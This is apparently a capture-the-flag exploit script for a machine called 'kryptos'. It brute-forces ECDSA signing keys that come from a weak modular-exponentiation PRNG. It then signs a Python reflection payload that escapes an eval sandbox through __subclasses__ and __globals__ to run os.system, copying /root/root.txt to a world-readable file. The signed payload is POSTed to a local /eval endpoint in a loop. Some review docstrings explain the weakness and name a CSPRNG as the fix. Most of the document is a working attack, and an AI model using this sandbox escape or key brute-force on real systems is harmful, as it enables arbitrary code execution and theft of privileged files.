Getting root access on kryptos by abusing a weak PRNG and Python reflection
import random | |
import json | |
import hashlib | |
import binascii | |
from ecdsa import VerifyingKey, SigningKey, NIST384p | |
from bottle import route, run, request, debug | |
from bottle import hook | |
from bottle import response as resp | |
import sys | |
import requests | |
def secure_rng(seed):
    """Derive a 256-bit integer from *seed* with a modular-exponentiation bit generator.

    This is a faithful re-implementation of the generator the script mirrors
    (the original comment called it "taken from the internet - probably
    secure"). Each of the 256 output bits is produced by stepping the state as
    ``state = g ** state mod p`` and emitting a 1 when the new state lies in
    the upper half of ``[0, p)``.

    NOTE(review): ``p`` is a 31-bit prime and the state is reduced modulo it on
    the very first step, so however wide *seed* is, the generator has at most
    ``p - 1`` distinct internal states — far fewer than the 256 output bits
    suggest. Using this output as key material is the weakness the gist title
    refers to; on the generating side the remedy is a CSPRNG
    (``os.urandom`` / ``secrets``), not a tweak to these constants.

    Args:
        seed: non-negative integer starting state.

    Returns:
        int in ``[0, 2**256)``; bit ``i`` is 1 iff step ``i`` landed above ``(p-1)/2``.
    """
    modulus = 2147483647
    generator = 2255412
    key_bits = 32 * 8
    # Same expression as the original on purpose: `/` is integer division
    # under Python 2 and true division under Python 3, and round() of either
    # gives the same threshold, so behaviour is identical across both.
    half = round((modulus - 1) / 2)

    state = seed
    result = 0
    for bit in range(key_bits):
        state = pow(generator, state, modulus)
        if state > half:
            # Each bit position is visited exactly once, so OR-ing the bit in
            # is the same as the original's `ret += 2**i`.
            result |= 1 << bit
    return result
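def verify(msg, sig):
    """Return True when the hex signature *sig* verifies *msg* under the module-global ``vk``.

    Any failure — malformed hex, wrong length, signature mismatch — is mapped
    to False rather than raised, which is the contract the original offered.

    Args:
        msg: the signed message (presumably bytes, as ``sign`` hands it to the
            key object unchanged).
        sig: hex string as produced by ``sign``.

    Returns:
        bool

    Why ``except Exception`` instead of the original bare ``except``: a bare
    clause also swallowed ``KeyboardInterrupt`` and ``SystemExit``, so the
    caller could not be interrupted cleanly while looping; the ordinary errors
    from ``unhexlify`` and ``vk.verify`` are still turned into False.

    NOTE(review): ``verify`` is not called anywhere in the visible script; it
    appears to mirror the checking side of the service, so keep the two in
    step if either changes.
    """
    try:
        return vk.verify(binascii.unhexlify(sig), msg)
    except Exception:
        return False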
def sign(msg):
    """Sign *msg* with the module-global ``sk`` and return the signature as hex.

    ``sk`` is (re)assigned by the driver loop at the bottom of the file before
    each call, so this is not a pure function: the result depends on whichever
    key the loop currently holds.

    Args:
        msg: the message to sign, passed through to ``sk.sign`` unchanged.

    Returns:
        the raw signature bytes, hex-encoded by ``binascii.hexlify``.
    """
    raw_signature = sk.sign(msg)
    return binascii.hexlify(raw_signature)
print "[+] Signing expression.." | |
expr = "[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('cp /root/root.txt /tmp/xct && chmod 777 /tmp/xct')" | |
proxies = {'http': "http://localhost:9090"} | |
response = 'Bad signature' | |
print "Bruting.." | |
while response == 'Bad signature': | |
seed = random.getrandbits(128) | |
rand = secure_rng(seed) + 1 | |
sk = SigningKey.from_secret_exponent(rand, curve=NIST384p) | |
vk = sk.get_verifying_key() | |
sig = sign(expr) | |
r = requests.post('http://127.0.0.1:81/eval', json={'expr': expr, 'sig': sig}, proxies=proxies) | |
response = r.text | |
print r.text | |
print seed |